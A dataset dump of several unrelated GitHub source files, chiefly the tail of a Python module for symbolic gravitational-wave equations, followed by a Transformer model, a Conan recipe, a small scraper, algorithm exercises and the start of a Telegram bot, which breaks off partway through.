(\n float(arg.base.subs([(symbols(key), val.value)]).evalf()) * val.unit\n )\n\n if exp < 0:\n numerator = val.to_string(precision=(dp + 1), format=\"latex\").replace(\n \"$\", \"\"\n )\n denominator = varlatex\n else:\n denominator = val.to_string(precision=(dp + 1), format=\"latex\").replace(\n \"$\", \"\"\n )\n numerator = varlatex\n\n if abs(exp) != 1:\n expstr = \"^{\" + str(abs(exp)) + \"}\"\n else:\n expstr = \"\"\n\n fiducial += (\n rf\"{lbrace}\\frac{{{numerator}}}{{{denominator}}}{rbrace}{expstr} \"\n )\n\n latex_equation += fiducial\n\n if displaytype.lower() == \"matplotlib\":\n return EquationLaTeXToImage(\"$\" + latex_equation + \"$\")\n else:\n comment = None\n if not nocomment:\n # add LaTeX comment to string with cweqgen version and equations call\n comment = f\"equation generated with cweqgen v{__version__}\"\n if self.equations_call is not None:\n comment += f\":\\n {self.equations_call}\"\n\n return EquationLaTeXString(latex_equation, comment=comment)\n\n def evaluate(self, **kwargs):\n \"\"\"\n Evaluate the equation using the given values.\n\n Keyword arguments can be passed using the keys of the\n :attr:`.EquationBase.default_fiducial_values` giving the values at\n which to perform the calculation. Otherwise the default values, or\n values set at initialisation are used. These can be 1d arrays,\n where if more that one value is an array of then a mesh grid will\n be created over the space and the values returned on that mesh.\n\n Parameters\n ----------\n value: bool\n If value is False (the default) the evaluated equation will be\n returned as an :class:`astropy.units.Quantity` object. If True\n just the values will be returned.\n \"\"\"\n\n const = self.constant\n fid = self.calculate_fiducial(**kwargs)\n\n value = const * fid\n\n if ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\":\n value = np.abs(value)\n\n if isinstance(value, Quantity):\n if not kwargs.get(\"value\", False):\n if ALLOWED_VARIABLES[self.variable][\"units\"] is not None:\n return value.to(ALLOWED_VARIABLES[self.variable][\"units\"])\n else:\n return value.si.decompose()\n else:\n # return as values rather than Quantity object\n return value.si.decompose().value\n else:\n return value\n\n def __call__(self, **kwargs):\n return self.evaluate(**kwargs)\n\n def rearrange(self, newvar, fidval=None, equal=None):\n r\"\"\"\n Rearrange the equation so that a different variable is on the left hand side,\n i.e., solve the equation for the given variable.\n\n Parameters\n ----------\n newvar: str\n The variable should be rearranged to the LHS of the equation.\n fidval: float, Quantity\n The value to use for the original LHS value. If not given this\n will be based on the original fiducial values.\n equal: EquationBase\n You can pass another equation to set as equal to the current\n equation before rearranging.\n\n Returns\n -------\n neweq: EquationBase\n Returns a new equation. The current equation is left unchanged.\n\n Example\n -------\n For example rearrange the braking index equation to put the\n frequency derivative :math:`\\dot{f}` on the left hand side:\n\n >>> eqn = equations(\"brakingindex\")\n >>> reqn = eqn.rearrange(\"rotationfdot\")\n\n which gives:\n\n .. math::\n\n \\dot{f}_{\\rm rot} = \\frac{1}{n^{1/2}} \\left(\\ddot{f}_{\\rm rot} f_{\\rm rot}\\right)^{1/2}\n \"\"\"\n\n if newvar not in self.var_names:\n raise KeyError(f\"{newvar} is not allowed\")\n\n if fidval is None:\n # use current fiducial values to get value of parameter being\n # swapped from LHS\n curval = self.evaluate()\n else:\n curval = fidval\n\n # check whether equating to other equation\n if isinstance(equal, EquationBase):\n if self.variable != equal.variable:\n raise ValueError(\n \"Equation can only be equated if the lhs variable is the same\"\n )\n eq = Eq(equal.sympy.rhs, self.sympy.rhs)\n else:\n eq = self.sympy\n\n # rearrange using solve (use the last value in solution in case two solutions\n # from sqrt). Expand out any variables with the same powers, so that they form\n # separate parts of the new equation\n neweq = expand_power_base(solve(eq, symbols(newvar))[-1], force=True)\n\n newkwargs = deepcopy(self.kwargs)\n\n # set new equation parts\n newkwargs[\"parts\"] = self.generate_parts(neweq)\n\n newfiducial = newkwargs.pop(\"default_fiducial_values\")\n newfiducial.pop(newvar)\n newfiducial[self.variable] = curval\n\n if isinstance(equal, EquationBase):\n newfiducial.update(equal.kwargs[\"default_fiducial_values\"])\n newkwargs[\"default_fiducial_values\"] = newfiducial\n\n newkwargs[\"latex_string\"] = ALLOWED_VARIABLES[newvar][\"latex_string\"]\n newkwargs[\"description\"] = ALLOWED_VARIABLES[newvar][\"description\"]\n\n newkwargs[\"rhs_latex_strings\"].pop(newvar)\n\n if not isinstance(equal, EquationBase):\n newkwargs[\"rhs_latex_strings\"][self.variable] = self.latex_name\n else:\n newkwargs[\"rhs_latex_strings\"].update(equal.kwargs[\"rhs_latex_strings\"])\n\n newkwargs[\"equation\"] = newvar # reset the equation name\n newkwargs[\"equation_variable\"] = newvar\n\n # create new EquationBase with updated constants and default fiducial values\n return EquationBase(**newkwargs)\n\n def substitute(self, other):\n r\"\"\"\n Substitute another equation into the current equation.\n\n Parameters\n ----------\n other: EquationBase\n The other equation to substitute into the current equation.\n\n Returns\n -------\n neweq: EquationBase\n Returns a new equation. The current equation is left unchanged.\n\n Example\n -------\n For example put the :math:`h_0` spin-down limit in terms of the\n braking index :math:`n` and second frequency derivative\n :math:`\\ddot{f}` (with the help of\n :meth:`~cweqgen.equations.EquationBase.rearrange`):\n\n >>> # get braking index equation\n >>> eqn = equations(\"brakingindex\")\n >>> # rearrange to put fdot on lhs\n >>> reqn = eqn.rearrange(\"rotationfdot\")\n >>> # get h0 spindown equation\n >>> eqnh0sd = equations(\"h0spindown\")\n >>> # substitute in the rearranged equation\n >>> neweq = eqnh0sd.substitute(reqn)\n\n with gives:\n\n .. math::\n\n h_0^{\\rm sd} = \\frac{\\sqrt{10} \\sqrt{G}}{2 c^{3/2}}\\frac{I_{zz}^{1/2} \\ddot{f}_{\\rm rot}^{1/4}}{d \\left(n f_{\\rm rot}\\right)^{1/4}}\n \"\"\"\n\n if not isinstance(other, EquationBase):\n raise TypeError(\"Other equation is not the right type\")\n\n try:\n rhs = self.sympy.rhs\n neweq = rhs.subs([(other.sympy.lhs, other.sympy.rhs)])\n except Exception as e:\n raise RuntimeError(f\"Could not perform substitution: {e}\")\n\n newkwargs = deepcopy(self.kwargs)\n newfiducial = newkwargs.pop(\"default_fiducial_values\")\n newfiducial.pop(other.variable)\n newfiducial.update(other.default_fiducial_values)\n\n newkwargs[\"default_fiducial_values\"] = newfiducial\n\n newkwargs[\"rhs_latex_strings\"].pop(other.variable)\n newkwargs[\"rhs_latex_strings\"].update(other.rhs_latex_strings)\n\n newkwargs[\"parts\"] = self.generate_parts(expand_power_base(neweq, force=True))\n\n # pass on any converter functions\n if \"converters\" not in newkwargs:\n newkwargs[\"converters\"] = other.converters\n else:\n newkwargs[\"converters\"].update(other.converters)\n\n return EquationBase(**newkwargs)\n\n @property\n def sympy_const(self):\n \"\"\"\n Construct and return a :class:`sympy.core.mul.Mul` containing the\n constants in the equation.\n \"\"\"\n\n if not hasattr(self, \"_sympy_const\"):\n self._sympy_const = 1\n sympy_const_unit_values = {}\n\n for arg in self.sympy.rhs.args:\n if arg.is_constant():\n if (\n arg.is_negative\n and ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n ):\n arg *= -1 # flip sign\n\n self._sympy_const *= arg\n else:\n if isinstance(arg, Symbol):\n name = arg.name\n elif isinstance(arg, Pow):\n name = str(arg.base)\n else:\n name = None\n\n if name in CONSTANTS:\n sympy_const_unit_values[name] = CONSTANTS[name]\n\n if ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\":\n # make sure values are positive\n if isinstance(arg, Pow):\n if _coeff_isneg(arg.args[0]):\n arg = (-1 * arg.args[0]) ** arg.args[1]\n else:\n if _coeff_isneg(arg):\n arg = -1 * arg\n\n self._sympy_const *= arg\n\n # evaluate constant by creating a lamdified function\n if self._sympy_const != 1:\n # make sure constant isn't imaginary\n if any([arg == I for arg in self._sympy_const.args]):\n self._sympy_const = self._sympy_const.replace(I, 1)\n\n constf = lambdify(\n [symbols(name) for name in sympy_const_unit_values.keys()],\n self._sympy_const,\n modules=[\"numpy\"],\n )\n constant = constf(**sympy_const_unit_values)\n\n if isinstance(constant, Quantity):\n self._constant = constant.si.decompose()\n else:\n self._constant = constant\n else:\n self._constant = self._sympy_const\n\n return self._sympy_const\n\n @property\n def constant(self):\n \"\"\"\n Return the constant coefficient factor in the equation in SI units\n (if it has dimensions).\n \"\"\"\n\n if not hasattr(self, \"_constant\"):\n _ = self.sympy_const\n\n return self._constant\n\n @property\n def sympy_var(self):\n \"\"\"\n Construct and return a :class:`sympy.core.mul.Mul` containing the\n variables in the equation.\n \"\"\"\n\n if not hasattr(self, \"_sympy_var\"):\n self._sympy_var = 1\n self._sympy_var_parts = {}\n self._sympy_var_lambda = {}\n\n # get variable names\n self._var_names = self._gather_var_argnames(self.sympy.rhs)\n self._gather_var_parts(self.sympy.rhs.args)\n\n return self._sympy_var\n\n @staticmethod\n def _gather_var_argnames(eqn):\n \"\"\"\n Find the variable names in an equation.\n \"\"\"\n\n argnames = [arg.name for arg in eqn.atoms() if isinstance(arg, Symbol)]\n for arg in list(argnames):\n if arg in CONSTANTS:\n argnames.remove(arg)\n\n return argnames\n\n def _gather_var_parts(self, args):\n \"\"\"\n Recursively get all the separate parts of the equation\n \"\"\"\n\n for arg in args:\n if not arg.is_constant():\n if isinstance(arg, Symbol):\n name = arg.name\n elif isinstance(arg, (Abs, Add, Pow)):\n name = self._gather_var_argnames(arg)\n if len(name) > 1:\n # recursively gather parts\n if isinstance(arg, Abs):\n abseqn = expand_power_base(arg.args[0], force=True).args\n else:\n abseqn = expand_power_base(arg, force=True).args\n\n self._gather_var_parts(abseqn)\n continue\n elif len(name) == 1:\n name = name[0]\n else:\n name = str(arg.base)\n else:\n raise TypeError(\"Value must be a Symbol, Pow, Add or Abs\")\n\n if name not in CONSTANTS:\n # set variables to abs if required\n if (\n ALLOWED_VARIABLES[name][\"sign\"] is None\n and ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n ):\n if isinstance(arg, Pow):\n arg = Abs(arg.args[0]) ** arg.args[1]\n else:\n arg = Abs(arg)\n\n self._sympy_var *= arg\n\n # store each part\n self._sympy_var_parts[name] = arg\n\n # create functions for each part of the equation\n self._sympy_var_lambda[name] = lambdify(\n [symbols(name)], arg, modules=[\"numpy\"]\n )\n\n @property\n def var_names(self):\n \"\"\"\n Get variable names from Sympy representation.\n \"\"\"\n\n if not hasattr(self, \"_var_names\"):\n _ = self.sympy_var\n\n return self._var_names\n\n @property\n def sympy_var_func(self):\n if not hasattr(self, \"_sympy_var_func\"):\n _ = self.sympy_var\n\n return self._sympy_var_func\n\n @property\n def sympy(self):\n \"\"\"\n Construct and return the equation as a\n :class:`sympy.core.relational.Equality`.\n \"\"\"\n\n if not hasattr(self, \"_sympy\"):\n eqstr = \" * \".join([f\"({c[0]})**({c[1]})\" for c in self.parts])\n sympeq = sympify(eqstr)\n self._sympy = Eq(symbols(self.variable), sympeq)\n\n return self._sympy\n\n @staticmethod\n def generate_parts(eqn, pow=1):\n \"\"\"\n Generate a list of \"parts\" from a Sympy equation.\n \"\"\"\n\n parts = []\n\n for arg in eqn.args:\n if isinstance(arg, (Abs, Mul)):\n parts.extend(EquationBase.generate_parts(arg, pow=pow))\n elif isinstance(arg, Pow):\n if isinstance(arg.base, (Abs, Mul, Pow)):\n exp = pow * arg.exp\n parts.extend(EquationBase.generate_parts(arg.base, pow=exp))\n else:\n parts.append((str(arg.base), str(arg.exp)))\n elif isinstance(arg, (Symbol, Add)):\n if pow != 1 and len(eqn.args) == 2:\n # it's got to this part from a Pow object\n if hasattr(arg, \"name\"):\n parts.append((arg.name, str(pow * eqn.args[-1])))\n else:\n parts.append((str(arg), str(pow * eqn.args[-1])))\n break\n else:\n parts.append((arg.name, str(pow)))\n elif str(arg) != \"1\":\n parts.append((str(arg), \"1\"))\n\n return parts\n\n @staticmethod\n def _frequency_converter(starteqn, end):\n \"\"\"\n Given an equation, and a required parameter, step through a set of\n frequency conversions until the equation is parameterised with the\n required variables.\n\n Parameters\n ----------\n starteqn: EquationBase\n The original equation\n end: str\n The variable name for the parameter that you want to equation to\n contain after the conversions are performed.\n\n Returns\n -------\n neweqn: EquationBase\n A new :class:`~cweqgen.equations.EquationBase` equation using the\n requested variable to parameterise it.\n \"\"\"\n\n neweqn = None\n\n # the conversion for frequency equations to loop through\n chain = [\n (\"rotationperiod\", equations(\"rotationperiod_to_angularrotationfrequency\")),\n (\n \"angularrotationfrequency\",\n equations(\"angularrotationfrequency_to_angulargwfrequency\"),\n ),\n (\"angulargwfrequency\", equations(\"angulargwfrequency_to_gwfrequency\")),\n (\"gwfrequency\", equations(\"gwfrequency_to_rotationfrequency\")),\n (\"rotationfrequency\", equations(\"rotationfrequency_to_period\")),\n ]\n\n # the conversion for frequency derivative equations to loop through\n chaindot = [\n (\n \"rotationperiod\",\n \"rotationpdot\",\n [equations(\"rotationpdot_to_angularrotationfdot\"), chain[0][1]],\n ),\n (\n \"angularrotationfrequency\",\n \"angularrotationfdot\",\n [equations(\"angularrotationfdot_to_angulargwfdot\"), chain[1][1]],\n ),\n (\n \"angulargwfrequency\",\n \"angulargwfdot\",\n [equations(\"angulargwfdot_to_gwfdot\"), chain[2][1]],\n ),\n (\n \"gwfrequency\",\n \"gwfdot\",\n [equations(\"gwfdot_to_rotationfdot\"), chain[3][1]],\n ),\n (\n \"rotationfrequency\",\n \"rotationfdot\",\n [equations(\"rotationfdot_to_period\"), chain[4][1]],\n ),\n ]\n\n # find the index of the end point\n endidx = ([link[0] for link in chain]).index(end)\n\n # find the starting conversion equation\n for i in range(len(chain)):\n if chain[i][0] in starteqn.var_names:\n break\n\n while True:\n # loop over conversions until finished\n if neweqn is None:\n neweqn = starteqn.substitute(chain[i][1])\n else:\n neweqn = neweqn.substitute(chain[i][1])\n\n # loop to same point as frequency parameter\n endidxdot = (i + 1) % len(chain)\n\n # find the starting conversion equation\n for j in range(len(chaindot)):\n if chaindot[j][1] in starteqn.var_names:\n break\n\n while True:\n # loop over conversions until finished\n for eqn in chaindot[j][2]:\n if neweqn is None and eqn.variable in starteqn.var_names:\n neweqn = starteqn.substitute(eqn)\n elif eqn.variable in neweqn.var_names:\n neweqn = neweqn.substitute(eqn)\n\n j = (j + 1) % len(chaindot)\n if j == endidxdot:\n break\n\n i = (i + 1) % len(chain)\n if i == endidx:\n break\n\n return neweqn\n\n def to(self, newvariable):\n \"\"\"\n Return a new version of the equation in terms of a new variable.\n Currently this is designed to convert between frequency-like and\n frequency first derivative parameters (it does not do higher frequency\n derivatives), e.g., converting an equation from using frequency and\n frequency derivative, to one using period and period derivative.\n\n Parameters\n ----------\n newvariable: str\n The new parameterisation of the equation. This can be one of:\n \"rotationfrequency\", \"rotationperiod\", \"gwfrequency\",\n \"angularrotationfrequency\", or \"angulargwfrequency\" (or any of the\n allowed aliases for these in\n :obj:`~cwinpy.definition.ALLOWED_VARIABLES`). If the equation\n contains equivalents of the variable and/or their first frequency\n derivative then both will be converted.\n\n Returns\n -------\n neweqn: EquationBase\n The equation in the new parameterisation.\n \"\"\"\n\n # find the variable name\n for var in ALLOWED_VARIABLES:\n if newvariable in ALLOWED_VARIABLES[var][\"aliases\"]:\n break\n else:\n raise ValueError(f\"{newvariable} is not a recognised variable name.\")\n\n if var not in [\n \"rotationfrequency\",\n \"rotationperiod\",\n \"gwfrequency\",\n \"angularrotationfrequency\",\n \"angulargwfrequency\",\n ]:\n raise ValueError(f\"No conversion is currently available for {var}\")\n\n return self._frequency_converter(self, var)\n\n\nclass EquationLaTeXString:\n def __init__(self, latexstring, comment=None):\n \"\"\"\n Class to hold a LaTeX equation string. It has a _repr_latex_ method to\n hook into the Jupyter notebook rich display system\n https://ipython.readthedocs.io/en/stable/config/integrating.html#rich-display\n and show the resulting string as a LaTeX equation.\n\n Parameters\n ----------\n latexstring: str\n The LaTeX string defining the equation.\n comment: str\n A LaTeX comment (% will be prepended to any lines)\n \"\"\"\n\n self.text = str(latexstring)\n self.comment = comment\n\n def __repr__(self):\n if self.comment is None:\n return self.text\n else:\n output = \"\".join(f\"% {line}\\n\" for line in self.comment.split(\"\\n\"))\n output += self.text\n return output\n\n def __str__(self):\n if self.comment is None:\n return self.text\n else:\n output = \"\".join(f\"% {line}\\n\" for line in self.comment.split(\"\\n\"))\n output += self.text\n return output\n\n def _repr_latex_(self):\n return \"$\" + self.text + \"$\"\n\n\nclass EquationLaTeXToImage:\n def __init__(self, latexstring, dpi=200):\n \"\"\"\n Class to hold a LaTeX equation string and covert it to an image for\n display in a Jupyter notebook.\n\n Parameters\n ----------\n latexstring: str\n The LaTeX string defining the equation.\n dpi: int\n The resolution (dots per inch) of the output plot.\n \"\"\"\n\n self.text = str(latexstring)\n\n self.dpi = dpi\n self.fig, self.ax = plt.subplots(1)\n\n try:\n t = self.ax.text(0.05, 0.5, self.text, usetex=True)\n except RuntimeError:\n t = self.ax.text(0.0, 0.5, self.text)\n self.ax.axis(\"off\")\n\n # crop figure to tight around the text\n bb = t.get_window_extent(renderer=self.fig.canvas.get_renderer())\n transf = self.ax.transData.inverted()\n bb_datacoords = bb.transformed(transf)\n\n rect = bb_datacoords.get_points().flatten()\n rect[3] += 0.1 * rect[3] # add 10% on to upper value for some reason!\n\n tight_params = {\"rect\": rect}\n\n self.fig.set_dpi(self.dpi)\n self.fig.set_tight_layout(tight_params)\n\n def savefig(self, *arg, **kwargs):\n kwargs.setdefault(\"dpi\", self.dpi)\n return self.fig.savefig(*arg, **kwargs)\n","repo_name":"cwinpy/cweqgen","sub_path":"cweqgen/equations.py","file_name":"equations.py","file_ext":"py","file_size_in_byte":43924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"14103115145","text":"# 1. The shape of the tensor passed across all modules are kept as (batch, d, seq_len)\n# 2. Each module's (except for attention) output is normalized, so no need to normalize input\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom Encoder import TransformerEncoder\nfrom Decoder import TransformerDecoder\nfrom OutputBlock import TransformerOutput\n\n# class Object(object):\n# pass\n# self = Object()\n\n# self = model\nclass Transformer(nn.Module):\n def __init__(self, model_settings, output_structure = \"Vanilla\"):\n super().__init__()\n torch.manual_seed(321)\n self.model_settings, self.output_structure = model_settings, output_structure\n self.encoder = TransformerEncoder(model_settings)\n self.decoder = TransformerDecoder(model_settings)\n self.linear = nn.Linear(model_settings[\"num_hiddens\"], len(model_settings[\"check_loss\"]) + 1)\n self.sigmoid = nn.Sigmoid()\n \n self.alpha_org, self.beta_org = model_settings[\"max_X\"] - model_settings[\"min_X\"], model_settings[\"min_X\"]\n if output_structure != \"Vanilla\":\n model_settings2 = model_settings.copy()\n model_settings2[\"num_hiddens\"] = model_settings[\"f_in\"][0]\n model_settings2[\"num_q\"] = model_settings2[\"num_k\"] = model_settings2[\"num_v\"] = model_settings[\"num_q_SAND\"]\n model_settings2[\"dropout\"] = model_settings[\"dropout_SAND\"]\n model_settings2[\"check_loss\"] = ()\n self.outblock = TransformerOutput(model_settings2, output_structure)\n \n def forward(self, x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m, iteration = 0, TAs_position = None, isTraining = True):\n # x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m = e_X, d_T, e_m_mh, e_m_mh, d_m_mh, d_m\n # x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m = x, d_T_full, emb_m_mh, emb_m_mh, None, None\n min_X, max_X, denoise_method = self.model_settings[\"min_X\"], self.model_settings[\"max_X\"], self.model_settings[\"denoise_method\"]\n e_output = self.encoder(x, e_m_mh, emb_m_mh)\n d_output = self.decoder(y_t, e_output, e_m_mh, d_m_mh)\n org = self.linear(d_output)\n \n if self.output_structure == \"Vanilla\":\n return self.sigmoid(org) * self.alpha_org + self.beta_org\n else:\n # iteration = 0; TAs_position = None; isTraining = True\n org_detach = org.detach().clone()[:, :, 0].unsqueeze(-1)\n smooth = self.outblock(org_detach, y_t, d_m, iteration, TAs_position, isTraining)\n return [smooth, self.sigmoid(org) * self.alpha_org + self.beta_org]\n\n\n","repo_name":"eric40065/SAND","sub_path":"py_code/TransformerModel.py","file_name":"TransformerModel.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23830391866","text":"\"\"\"\nWrite a function named uses_all that takes a word and a string of required letters,\nand that returns True if the word uses all the required letters at least once.\n\"\"\"\n\ndef used_all():\n word = input(\"Enter the word:\")\n letters = input(\"Enter the string of letters:\")\n count = 0\n\n l = len(letters)\n for alphabet in word:\n if alphabet in letters:\n count=count+1\n if count>=l:\n return True\n else:\n return False\n\nprint(used_all())\n","repo_name":"PandaWhoCodes/ThinkPython","sub_path":"used_all.py","file_name":"used_all.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4941314081","text":"import pickle\nimport json\nfrom email.mime.text import MIMEText\n\nclass Data:\n\turls = []\n\tpickle = {\"save\": False, \"path\": \"\"}\n\tscrape_order = []\n\tcols = []\n\tpages = []\n\temail = {\"send\": False, \"path\": \"\", \"address\": \"\", \"subject\": \"\", \"body\": \"\"}\n\n\t@classmethod\n\tdef load_topic(cls, topic_path):\n\t\twith open(topic_path, \"r\", encoding=\"utf-8\") as f:\n\t\t\tparams = json.load(f)\n\t\t\tprint(\"--\", params['header'], \"----\")\n\t\t\tcls.pickle = params['pickle']\n\t\t\tcls.email = params['email']\n\t\t\tdef eval_email(email_path):\n\t\t\t\twith open(email_path, \"r\", encoding=\"utf8\") as email_file:\n\t\t\t\t\tbody = email_file.read()\n\t\t\t\t\treturn MIMEText(body, \"html\")\n\t\t\tcls.email['body'] = eval_email(params['email']['path'])\n\t\t\tcls.pages = params['pages']\n\t\t\tdef eval_pages(pages):\n\t\t\t\timport sites, filters\n\t\t\t\tfor i, _ in enumerate(pages):\n\t\t\t\t\tpages[i][\"site\"] = eval(f\"sites.{pages[i]['site']}\")\n\t\t\t\t\tpages[i][\"filter\"] = eval(f\"filters.{pages[i]['filter']}\")\n\t\t\t\treturn pages\n\t\t\tcls.pages = eval_pages(params['pages'])\n\t\t\tcls.cols = params['cols']\n\n\t@classmethod\n\tdef get_urls_from_pickle(cls):\n\t\ttry:\n\t\t\twith open(cls.pickle['path'], 'rb') as f:\n\t\t\t\turls = pickle.load(f)\n\t\texcept (EOFError, FileNotFoundError):\n\t\t\t\turls = []\n\t\treturn urls\n\n\t@classmethod\n\tdef get_urls(cls):\n\t\tif Data.urls == []:\n\t\t\tData.urls = Data.get_urls_from_pickle()\n\t\treturn Data.urls\n\n\t@classmethod\n\tdef already_seen(cls, url):\n\t\treturn url in Data.get_urls()\n\n\t@classmethod\n\tdef save_url(cls, url):\n\t\tData.urls.append(url)\n\n\t@classmethod\n\tdef save_to_pickle(cls):\n\t\tif (not cls.pickle['path']):\n\t\t\treturn\n\t\twith open(cls.pickle['path'], 'wb') as pickle_file:\n\t\t\tpickle.dump(Data.get_urls(), pickle_file)\t\t\n\t\t","repo_name":"francoismartineau/scraper","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31966813455","text":"from conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass TgbotConan(ConanFile):\n name = \"tgbot\"\n\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"http://reo7sp.github.io/tgbot-cpp\"\n description = \"C++ library for Telegram bot API\"\n topics = (\"tgbot\", \"telegram\", \"telegram-api\", \"telegram-bot\", \"bot\")\n license = \"MIT\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n generators = \"cmake\", \"cmake_find_package\"\n exports_sources = [\"CMakeLists.txt\"]\n\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n self.requires(\"boost/1.79.0\")\n self.requires(\"libcurl/7.84.0\")\n self.requires(\"openssl/1.1.1q\")\n\n @property\n def _required_boost_components(self):\n return [\"system\"]\n\n def validate(self):\n if self.settings.compiler.cppstd:\n tools.check_min_cppstd(self, 11)\n miss_boost_required_comp = any(getattr(self.options[\"boost\"], \"without_{}\".format(boost_comp), True) for boost_comp in self._required_boost_components)\n if self.options[\"boost\"].header_only or miss_boost_required_comp:\n raise ConanInvalidConfiguration(\"{0} requires non header-only boost with these components: {1}\".format(self.name, \", \".join(self._required_boost_components)))\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _patch_sources(self):\n # Don't force PIC\n tools.replace_in_file(\n os.path.join(self._source_subfolder, \"CMakeLists.txt\"),\n \"set_property(TARGET ${PROJECT_NAME} PROPERTY POSITION_INDEPENDENT_CODE ON)\",\n \"\"\n )\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"ENABLE_TESTS\"] = False\n self._cmake.configure()\n return self._cmake\n\n def build(self):\n self._patch_sources()\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n def package_info(self):\n self.cpp_info.libs = [\"TgBot\"]\n self.cpp_info.requires = [\"boost::headers\", \"boost::system\", \"libcurl::libcurl\", \"openssl::openssl\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/tgbot/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"71213212408","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nN = int(input()) # 개수 입력\nl = list() # 저장할 리스트\n\nfor i in range(N): # 배열 안에 입력\n l.append(int(input()))\n \nl.sort()\n\nfor i in l:\n print(i)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"knamk7/algorithm_study","sub_path":"Week1(Sorting)/Day1/2750.py","file_name":"2750.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72478664248","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nn = input()\nstart = [\"00\", \"00\"]\nend = [\"23\", \"59\"]\nfor _ in range(int(n)):\n\tstartTemp, endTemp = input().split(\" ~ \")\n\tstartHour, startMin = startTemp.split(\":\")\n\tendHour, endMin = endTemp.split(\":\")\n\tif int(startHour) > int(start[0]):\n\t\tstart[0] = startHour\n\t\tstart[1] = startMin\n\telif int(startHour) == int(start[0]) and int(startMin) > int(start[1]):\n\t\tstart[1] = startMin\n\tif int(endHour) < int(end[0]):\n\t\tend[0] = endHour\n\t\tend[1] = endMin\n\telif int(endHour) == int(end[0]) and int(endMin) < int(end[1]):\n\t\tend[1] = endMin\nif start[0] > end[0] or (start[0] == end[0] and start[1] >= end[1]):\n\tprint(\"-1\")\nelse:\n\tprint(f\"{':'.join(start)} ~ {':'.join(end)}\")","repo_name":"eehwan/Algorithm-solutions","sub_path":"scofe2021/1차/대여 시간을 추천���드립니다.py","file_name":"대여 시간을 추천해드립니다.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14116858423","text":"class disjoint_set:\n def __init__(self, n):\n self.rank = [0] * n\n self.size = [1] * n\n self.max = 1\n self.parent = [i for i in range(n)]\n \n def find(self, x):\n if x != self.parent[x]:\n self.parent[x] = self.find(self.parent[x])\n return self.parent[x]\n \n def union(self, x, y):\n x, y = self.find(x), self.find(y)\n if x == y:\n return\n if self.rank[x] > self.rank[y]:\n self.parent[y] = x\n self.size[x] += self.size[y]\n else:\n self.parent[x] = y\n self.size[y] += self.size[x]\n if self.rank[x] == self.rank[y]:\n self.rank[y] += 1\n self.max = max(self.max, self.size[x], self.size[y])\n \n def group(self):\n s = set()\n for x in self.parent:\n s.add(self.find(x))\n return len(s)\n \n def get_max(self):\n return self.max\n\nclass Solution:\n def removeStones(self, stones: List[List[int]]) -> int:\n n = len(stones)\n ds = disjoint_set(n)\n\n row = [[] for _ in range(10000)]\n col = [[] for _ in range(10000)]\n for i, s in enumerate(stones):\n row[s[0]].append(i)\n col[s[1]].append(i)\n \n for r in row:\n for i in range(1, len(r)):\n ds.union(r[i], r[i-1])\n \n for c in col:\n for i in range(1, len(c)):\n ds.union(c[i], c[i-1])\n \n return n-ds.group()\n ","repo_name":"siyile/leetcode","sub_path":"src/Problem947.py","file_name":"Problem947.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10658279738","text":"import asyncio\nimport json\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.utils.markdown import hbold, hlink\nfrom aiogram.dispatcher.filters import Text\n\nfrom config import token, channel_id, admin_id\nfrom news import check_news_update\nfrom weather import get_weather, EmptyWeather\nfrom timetable import get_timetable, show_list_timetable\nfrom announcement import check_ann_update, get_announcements\n\nbot = Bot(token=token, parse_mode=types.ParseMode.HTML)\ndp = Dispatcher(bot)\nusers_dict = {}\n\n\n@dp.message_handler(commands=\"start\")\nasync def start(message: types.Message):\n start_buttons = ['Анонсы мероприятий',\n 'Последние 5 новостей',\n 'Расписание 